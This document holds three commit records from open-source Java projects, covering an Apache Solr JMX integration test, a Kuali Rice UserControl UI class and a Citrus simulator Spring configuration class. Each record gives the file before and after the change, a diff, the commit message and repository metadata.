/** * Licensed to the Apache Software Foundation (ASF) under one or more * contributor license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright ownership. * The ASF licenses this file to You under the Apache License, Version 2.0 * (the "License"); you may not use this file except in compliance with * the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.apache.solr.core; import org.apache.solr.core.JmxMonitoredMap.SolrDynamicMBean; import org.apache.solr.util.AbstractSolrTestCase; import org.junit.After; import org.junit.Before; import org.junit.Ignore; import org.junit.Test; import javax.management.*; import java.lang.management.ManagementFactory; import java.util.*; /** * Test for JMX Integration * * * @since solr 1.3 */ public class TestJmxIntegration extends AbstractSolrTestCase { @Override public String getSchemaFile() { return "schema.xml"; } @Override public String getSolrConfigFile() { return "solrconfig.xml"; } @Override @Before public void setUp() throws Exception { // Make sure that at least one MBeanServer is available MBeanServer mbeanServer = ManagementFactory.getPlatformMBeanServer(); super.setUp(); } @Override @After public void tearDown() throws Exception { super.tearDown(); } @Test public void testJmxRegistration() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxRegistration: " + servers); assertNotNull("MBeanServers were null", servers); assertFalse("No MBeanServer was found", servers.isEmpty()); MBeanServer mbeanServer = servers.get(0); assertTrue("No MBeans found in server", mbeanServer.getMBeanCount() > 0); Set<ObjectInstance> objects = mbeanServer.queryMBeans(null, null); assertFalse("No SolrInfoMBean objects found in mbean server", objects .isEmpty()); for (ObjectInstance o : objects) { MBeanInfo mbeanInfo = mbeanServer.getMBeanInfo(o.getObjectName()); if (mbeanInfo.getClassName().endsWith(SolrDynamicMBean.class.getName())) { assertTrue("No Attributes found for mbean: " + mbeanInfo, mbeanInfo .getAttributes().length > 0); } } } @Test public void testJmxUpdate() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); log.info("Servers in testJmxUpdate: " + servers); log.info(h.getCore().getInfoRegistry().toString()); SolrInfoMBean bean = null; // wait until searcher is registered for (int i=0; i<100; i++) { bean = h.getCore().getInfoRegistry().get("searcher"); if (bean != null) break; Thread.sleep(250); } if (bean==null) throw new RuntimeException("searcher was never registered"); ObjectName searcher = getObjectName("searcher", bean); MBeanServer mbeanServer = servers.get(0); log.info("Mbeans in server: " + mbeanServer.queryNames(null, null)); assertFalse("No mbean found for SolrIndexSearcher", mbeanServer.queryMBeans(searcher, null).isEmpty()); int oldNumDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertU(adoc("id", "1")); assertU("commit", commit()); int numDocs = Integer.valueOf((String) mbeanServer.getAttribute(searcher, "numDocs")); assertTrue("New numDocs is same as old numDocs as reported by JMX", numDocs > oldNumDocs); } @Test @Ignore("fix me") public void testJmxOnCoreReload() throws Exception { List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); MBeanServer mbeanServer = servers.get(0); String coreName = h.getCore().getName(); if (coreName.length() == 0) { coreName = h.getCoreContainer().getDefaultCoreName().length() > 0 ? h.getCoreContainer().getDefaultCoreName() : ""; } Set<ObjectInstance> oldBeans = mbeanServer.queryMBeans(null, null); int oldNumberOfObjects = 0; for (ObjectInstance bean : oldBeans) { try { if (String.valueOf(h.getCore().hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { oldNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } log.info("Before Reload: Size of infoRegistry: " + h.getCore().getInfoRegistry().size() + " MBeans: " + oldNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", h.getCore().getInfoRegistry().size(), oldNumberOfObjects); h.getCoreContainer().reload(coreName); Set<ObjectInstance> newBeans = mbeanServer.queryMBeans(null, null); int newNumberOfObjects = 0; int registrySize = 0; SolrCore core = h.getCoreContainer().getCore(coreName); try { registrySize = core.getInfoRegistry().size(); for (ObjectInstance bean : newBeans) { try { if (String.valueOf(core.hashCode()).equals(mbeanServer.getAttribute(bean.getObjectName(), "coreHashCode"))) { newNumberOfObjects++; } } catch (AttributeNotFoundException e) { // expected } } } finally { core.close(); } log.info("After Reload: Size of infoRegistry: " + registrySize + " MBeans: " + newNumberOfObjects); assertEquals("Number of registered MBeans is not the same as info registry size", registrySize, newNumberOfObjects); } private ObjectName getObjectName(String key, SolrInfoMBean infoBean) throws MalformedObjectNameException { Hashtable<String, String> map = new Hashtable<String, String>(); map.put("type", key); map.put("id", infoBean.getName()); String coreName = h.getCore().getName(); return ObjectName.getInstance(("solr" + (null != coreName ? "/" + coreName : "")), map); } }
SOLR-2715: add reason for @Ingore to @Ignore msg git-svn-id: 308d55f399f3bd9aa0560a10e81a003040006c48@1196156 13f79535-47bb-0310-9956-ffa450edef68
core/src/test/org/apache/solr/core/TestJmxIntegration.java
SOLR-2715: add reason for @Ingore to @Ignore msg
<ide><path>ore/src/test/org/apache/solr/core/TestJmxIntegration.java <ide> numDocs > oldNumDocs); <ide> } <ide> <del> @Test @Ignore("fix me") <add> @Test @Ignore("timing problem? https://issues.apache.org/jira/browse/SOLR-2715") <ide> public void testJmxOnCoreReload() throws Exception { <ide> List<MBeanServer> servers = MBeanServerFactory.findMBeanServer(null); <ide> MBeanServer mbeanServer = servers.get(0);
Java
apache-2.0
400e5b30fae9ecc017047cbe19510c5a00ebc80f
0
ewestfal/rice,smith750/rice,bsmith83/rice-1,shahess/rice,bhutchinson/rice,sonamuthu/rice-1,jwillia/kc-rice1,bsmith83/rice-1,geothomasp/kualico-rice-kc,gathreya/rice-kc,UniversityOfHawaiiORS/rice,rojlarge/rice-kc,gathreya/rice-kc,bhutchinson/rice,ewestfal/rice,smith750/rice,gathreya/rice-kc,kuali/kc-rice,sonamuthu/rice-1,cniesen/rice,cniesen/rice,geothomasp/kualico-rice-kc,gathreya/rice-kc,rojlarge/rice-kc,bsmith83/rice-1,ewestfal/rice-svn2git-test,UniversityOfHawaiiORS/rice,rojlarge/rice-kc,smith750/rice,ewestfal/rice,shahess/rice,kuali/kc-rice,rojlarge/rice-kc,ewestfal/rice-svn2git-test,ewestfal/rice-svn2git-test,ewestfal/rice-svn2git-test,bhutchinson/rice,shahess/rice,jwillia/kc-rice1,ewestfal/rice,bhutchinson/rice,UniversityOfHawaiiORS/rice,bsmith83/rice-1,cniesen/rice,smith750/rice,sonamuthu/rice-1,ewestfal/rice,rojlarge/rice-kc,jwillia/kc-rice1,sonamuthu/rice-1,geothomasp/kualico-rice-kc,jwillia/kc-rice1,geothomasp/kualico-rice-kc,UniversityOfHawaiiORS/rice,shahess/rice,cniesen/rice,kuali/kc-rice,gathreya/rice-kc,shahess/rice,smith750/rice,geothomasp/kualico-rice-kc,bhutchinson/rice,jwillia/kc-rice1,kuali/kc-rice,cniesen/rice,UniversityOfHawaiiORS/rice,kuali/kc-rice
/** * Copyright 2005-2012 The Kuali Foundation * * Licensed under the Educational Community License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.opensource.org/licenses/ecl2.php * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kuali.rice.krad.uif.control; import org.apache.commons.lang.StringUtils; import org.kuali.rice.kim.api.identity.Person; import org.kuali.rice.kim.api.identity.PersonService; import org.kuali.rice.kim.api.services.KimApiServiceLocator; import org.kuali.rice.krad.uif.field.InputField; import org.kuali.rice.krad.uif.util.ScriptUtils; import org.kuali.rice.krad.uif.view.View; import org.kuali.rice.krad.uif.component.Component; import org.kuali.rice.krad.uif.component.MethodInvokerConfig; import org.kuali.rice.krad.uif.field.AttributeQuery; import org.kuali.rice.krad.uif.widget.QuickFinder; /** * Represents a user control, which is a special control to handle * the input of a Person * * @author Kuali Rice Team ([email protected]) */ public class UserControl extends TextControl { private static final long serialVersionUID = 7468340793076585869L; private String principalIdPropertyName; private String personNamePropertyName; private String personObjectPropertyName; public UserControl() { super(); } /** * @see org.kuali.rice.krad.uif.component.ComponentBase#performApplyModel(org.kuali.rice.krad.uif.view.View, * java.lang.Object, org.kuali.rice.krad.uif.component.Component) */ @Override public void performApplyModel(View view, Object model, Component parent) { super.performApplyModel(view, model, parent); if (!(parent instanceof InputField)) { return; } InputField field = (InputField) parent; field.getAdditionalHiddenPropertyNames().add(principalIdPropertyName); if (!field.isReadOnly()) { // add information fields if (StringUtils.isNotBlank(personNamePropertyName)) { field.getPropertyNamesForAdditionalDisplay().add(personNamePropertyName); } else { field.getPropertyNamesForAdditionalDisplay().add(personObjectPropertyName + ".name"); } // setup script to clear id field when name is modified String idPropertyPath = field.getBindingInfo().getPropertyAdjustedBindingPath(principalIdPropertyName); String onChangeScript = "setValue('" + ScriptUtils.escapeName(idPropertyPath) + "','');"; if (StringUtils.isNotBlank(getOnChangeScript())) { onChangeScript = getOnChangeScript() + onChangeScript; } setOnChangeScript(onChangeScript); } if (field.isReadOnly() && StringUtils.isBlank(field.getReadOnlyDisplaySuffixPropertyName())) { if (StringUtils.isNotBlank(personNamePropertyName)) { field.setReadOnlyDisplaySuffixPropertyName(personNamePropertyName); } else { field.setReadOnlyDisplaySuffixPropertyName(personObjectPropertyName + ".name"); } } // setup field query for displaying name AttributeQuery attributeQuery = new AttributeQuery(); MethodInvokerConfig methodInvokerConfig = new MethodInvokerConfig(); PersonService personService = KimApiServiceLocator.getPersonService(); methodInvokerConfig.setTargetObject(personService); attributeQuery.setQueryMethodInvokerConfig(methodInvokerConfig); attributeQuery.setQueryMethodToCall("getPersonByPrincipalName"); attributeQuery.getQueryMethodArgumentFieldList().add(field.getPropertyName()); attributeQuery.getReturnFieldMapping().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { attributeQuery.getReturnFieldMapping().put("name", personNamePropertyName); } else { attributeQuery.getReturnFieldMapping().put("name", personObjectPropertyName + ".name"); } field.setAttributeQuery(attributeQuery); // setup field lookup QuickFinder quickFinder = field.getQuickfinder(); if (quickFinder.isRender()) { if (StringUtils.isBlank(quickFinder.getDataObjectClassName())) { quickFinder.setDataObjectClassName(Person.class.getName()); } if (quickFinder.getFieldConversions().isEmpty()) { quickFinder.getFieldConversions().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { quickFinder.getFieldConversions().put("name", personNamePropertyName); } else { quickFinder.getFieldConversions().put("name", personObjectPropertyName + ".name"); } quickFinder.getFieldConversions().put("principalName", field.getPropertyName()); } } } /** * The name of the property on the parent object that holds the principal id * * @return String principalIdPropertyName */ public String getPrincipalIdPropertyName() { return principalIdPropertyName; } /** * Setter for the name of the property on the parent object that holds the principal id * * @param principalIdPropertyName */ public void setPrincipalIdPropertyName(String principalIdPropertyName) { this.principalIdPropertyName = principalIdPropertyName; } /** * The name of the property on the parent object that holds the person name * * @return String personNamePropertyName */ public String getPersonNamePropertyName() { return personNamePropertyName; } /** * Setter for the name of the property on the parent object that holds the person name * * @param personNamePropertyName */ public void setPersonNamePropertyName(String personNamePropertyName) { this.personNamePropertyName = personNamePropertyName; } /** * The name of the property on the parent object that holds the person object * * @return String personObjectPropertyName */ public String getPersonObjectPropertyName() { return personObjectPropertyName; } /** * Setter for the name of the property on the parent object that holds the person object * * @param personObjectPropertyName */ public void setPersonObjectPropertyName(String personObjectPropertyName) { this.personObjectPropertyName = personObjectPropertyName; } }
krad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java
/** * Copyright 2005-2012 The Kuali Foundation * * Licensed under the Educational Community License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.opensource.org/licenses/ecl2.php * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package org.kuali.rice.krad.uif.control; import org.apache.commons.lang.StringUtils; import org.kuali.rice.kim.api.identity.Person; import org.kuali.rice.kim.api.identity.PersonService; import org.kuali.rice.kim.api.services.KimApiServiceLocator; import org.kuali.rice.krad.uif.field.InputField; import org.kuali.rice.krad.uif.util.ScriptUtils; import org.kuali.rice.krad.uif.view.View; import org.kuali.rice.krad.uif.component.Component; import org.kuali.rice.krad.uif.component.MethodInvokerConfig; import org.kuali.rice.krad.uif.field.AttributeQuery; import org.kuali.rice.krad.uif.widget.QuickFinder; /** * Represents a user control, which is a special control to handle * the input of a Person * * @author Kuali Rice Team ([email protected]) */ public class UserControl extends TextControl { private static final long serialVersionUID = 7468340793076585869L; private String principalIdPropertyName; private String personNamePropertyName; private String personObjectPropertyName; public UserControl() { super(); } @Override public void performApplyModel(View view, Object model, Component parent) { super.performApplyModel(view, model, parent); if (!(parent instanceof InputField)) { return; } InputField field = (InputField) parent; field.getAdditionalHiddenPropertyNames().add(principalIdPropertyName); if (!field.isReadOnly()) { // add information fields if (StringUtils.isNotBlank(personNamePropertyName)) { field.getPropertyNamesForAdditionalDisplay().add(personNamePropertyName); } else { field.getPropertyNamesForAdditionalDisplay().add(personObjectPropertyName + ".name"); } // setup script to clear id field when name is modified String idPropertyPath = field.getBindingInfo().getPropertyAdjustedBindingPath(principalIdPropertyName); String onChangeScript = "setValue('" + ScriptUtils.escapeName(idPropertyPath) + "','');"; if (StringUtils.isNotBlank(getOnChangeScript())) { onChangeScript = getOnChangeScript() + onChangeScript; } setOnChangeScript(onChangeScript); } if (field.isReadOnly() && StringUtils.isBlank(field.getReadOnlyDisplaySuffixPropertyName())) { if (StringUtils.isNotBlank(personNamePropertyName)) { field.setReadOnlyDisplaySuffixPropertyName(personNamePropertyName); } else { field.setReadOnlyDisplaySuffixPropertyName(personObjectPropertyName + ".name"); } } // setup field query for displaying name AttributeQuery attributeQuery = new AttributeQuery(); MethodInvokerConfig methodInvokerConfig = new MethodInvokerConfig(); PersonService personService = KimApiServiceLocator.getPersonService(); methodInvokerConfig.setTargetObject(personService); attributeQuery.setQueryMethodInvokerConfig(methodInvokerConfig); attributeQuery.setQueryMethodToCall("getPersonByPrincipalName"); attributeQuery.getQueryMethodArgumentFieldList().add(field.getPropertyName()); attributeQuery.getReturnFieldMapping().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { attributeQuery.getReturnFieldMapping().put("name", personNamePropertyName); } else { attributeQuery.getReturnFieldMapping().put("name", personObjectPropertyName + ".name"); } field.setAttributeQuery(attributeQuery); // setup field lookup QuickFinder quickFinder = field.getQuickfinder(); if (quickFinder.isRender()) { if (StringUtils.isBlank(quickFinder.getDataObjectClassName())) { quickFinder.setDataObjectClassName(Person.class.getName()); } if (quickFinder.getFieldConversions().isEmpty()) { quickFinder.getFieldConversions().put("principalId", principalIdPropertyName); if (StringUtils.isNotBlank(personNamePropertyName)) { quickFinder.getFieldConversions().put("name", personNamePropertyName); } else { quickFinder.getFieldConversions().put("name", personObjectPropertyName + ".name"); } quickFinder.getFieldConversions().put("principalName", field.getPropertyName()); } } } /** * The name of the property on the parent object that holds the principal id * * @return String principalIdPropertyName */ public String getPrincipalIdPropertyName() { return principalIdPropertyName; } /** * Setter for the name of the property on the parent object that holds the principal id * * @param principalIdPropertyName */ public void setPrincipalIdPropertyName(String principalIdPropertyName) { this.principalIdPropertyName = principalIdPropertyName; } /** * The name of the property on the parent object that holds the person name * * @return String personNamePropertyName */ public String getPersonNamePropertyName() { return personNamePropertyName; } /** * Setter for the name of the property on the parent object that holds the person name * * @param personNamePropertyName */ public void setPersonNamePropertyName(String personNamePropertyName) { this.personNamePropertyName = personNamePropertyName; } /** * The name of the property on the parent object that holds the person object * * @return String personObjectPropertyName */ public String getPersonObjectPropertyName() { return personObjectPropertyName; } /** * Setter for the name of the property on the parent object that holds the person object * * @param personObjectPropertyName */ public void setPersonObjectPropertyName(String personObjectPropertyName) { this.personObjectPropertyName = personObjectPropertyName; } }
KULRICE-6641 - Adding javadocs.
krad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java
KULRICE-6641 - Adding javadocs.
<ide><path>rad/krad-web-framework/src/main/java/org/kuali/rice/krad/uif/control/UserControl.java <ide> super(); <ide> } <ide> <add> /** <add> * @see org.kuali.rice.krad.uif.component.ComponentBase#performApplyModel(org.kuali.rice.krad.uif.view.View, <add> * java.lang.Object, org.kuali.rice.krad.uif.component.Component) <add> */ <ide> @Override <ide> public void performApplyModel(View view, Object model, Component parent) { <ide> super.performApplyModel(view, model, parent);
Java
apache-2.0
66bc08aec02148fd3998912e3c234236982cdac0
0
christophd/citrus-simulator,christophd/citrus-simulator,christophd/citrus-simulator,christophd/citrus-simulator
/* * Copyright 2006-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.consol.citrus.simulator.annotation; import com.consol.citrus.config.CitrusSpringConfig; import com.consol.citrus.simulator.bean.ScenarioBeanNameGenerator; import com.consol.citrus.simulator.config.SimulatorConfigurationProperties; import com.consol.citrus.simulator.config.SimulatorImportSelector; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.*; import org.springframework.core.io.ClassPathResource; import java.io.IOException; import java.io.InputStream; import java.util.Properties; /** * @author Christoph Deppisch */ @Configuration @ComponentScan(basePackages = { "com.consol.citrus.simulator.config", "com.consol.citrus.simulator.controller", "com.consol.citrus.simulator.endpoint", "com.consol.citrus.simulator.listener", "com.consol.citrus.simulator.service", }, nameGenerator = ScenarioBeanNameGenerator.class) @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) @ImportResource( locations = { "classpath*:citrus-simulator-context.xml", "classpath*:META-INF/citrus-simulator-context.xml" }) @PropertySource( value = { "citrus-simulator.properties", "META-INF/citrus-simulator.properties" }, ignoreResourceNotFound = true) @EnableConfigurationProperties(SimulatorConfigurationProperties.class) public class SimulatorSupport { /** Logger */ private static Logger log = LoggerFactory.getLogger(SimulatorSupport.class); /** Application version */ private static String version; /* Load application version */ static { try (final InputStream in = new ClassPathResource("META-INF/app.version").getInputStream()) { Properties versionProperties = new Properties(); versionProperties.load(in); version = versionProperties.get("app.version").toString(); } catch (IOException e) { log.warn("Unable to read application version information", e); version = ""; } } }
simulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java
/* * Copyright 2006-2017 the original author or authors. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.consol.citrus.simulator.annotation; import com.consol.citrus.config.CitrusSpringConfig; import com.consol.citrus.simulator.bean.ScenarioBeanNameGenerator; import com.consol.citrus.simulator.config.SimulatorConfigurationProperties; import com.consol.citrus.simulator.config.SimulatorImportSelector; import org.slf4j.Logger; import org.slf4j.LoggerFactory; import org.springframework.boot.context.properties.EnableConfigurationProperties; import org.springframework.context.annotation.*; import org.springframework.core.io.ClassPathResource; import java.io.IOException; import java.io.InputStream; import java.util.Properties; /** * @author Christoph Deppisch */ @Configuration @ComponentScan(basePackages = { "com.consol.citrus.simulator.config", "com.consol.citrus.simulator.listener", "com.consol.citrus.simulator.service", "com.consol.citrus.simulator.endpoint", "com.consol.citrus.simulator.web", "com.consol.citrus.simulator.controller", }, nameGenerator = ScenarioBeanNameGenerator.class) @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) @ImportResource( locations = { "classpath*:citrus-simulator-context.xml", "classpath*:META-INF/citrus-simulator-context.xml" }) @PropertySource( value = { "citrus-simulator.properties", "META-INF/citrus-simulator.properties" }, ignoreResourceNotFound = true) @EnableConfigurationProperties(SimulatorConfigurationProperties.class) public class SimulatorSupport { /** Logger */ private static Logger log = LoggerFactory.getLogger(SimulatorSupport.class); /** Application version */ private static String version; /* Load application version */ static { try (final InputStream in = new ClassPathResource("META-INF/app.version").getInputStream()) { Properties versionProperties = new Properties(); versionProperties.load(in); version = versionProperties.get("app.version").toString(); } catch (IOException e) { log.warn("Unable to read application version information", e); version = ""; } } }
removed unused package from component scan
simulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java
removed unused package from component scan
<ide><path>imulator-core/src/main/java/com/consol/citrus/simulator/annotation/SimulatorSupport.java <ide> @Configuration <ide> @ComponentScan(basePackages = { <ide> "com.consol.citrus.simulator.config", <add> "com.consol.citrus.simulator.controller", <add> "com.consol.citrus.simulator.endpoint", <ide> "com.consol.citrus.simulator.listener", <ide> "com.consol.citrus.simulator.service", <del> "com.consol.citrus.simulator.endpoint", <del> "com.consol.citrus.simulator.web", <del> "com.consol.citrus.simulator.controller", <ide> }, nameGenerator = ScenarioBeanNameGenerator.class) <ide> @Import(value = {CitrusSpringConfig.class, SimulatorImportSelector.class}) <ide> @ImportResource(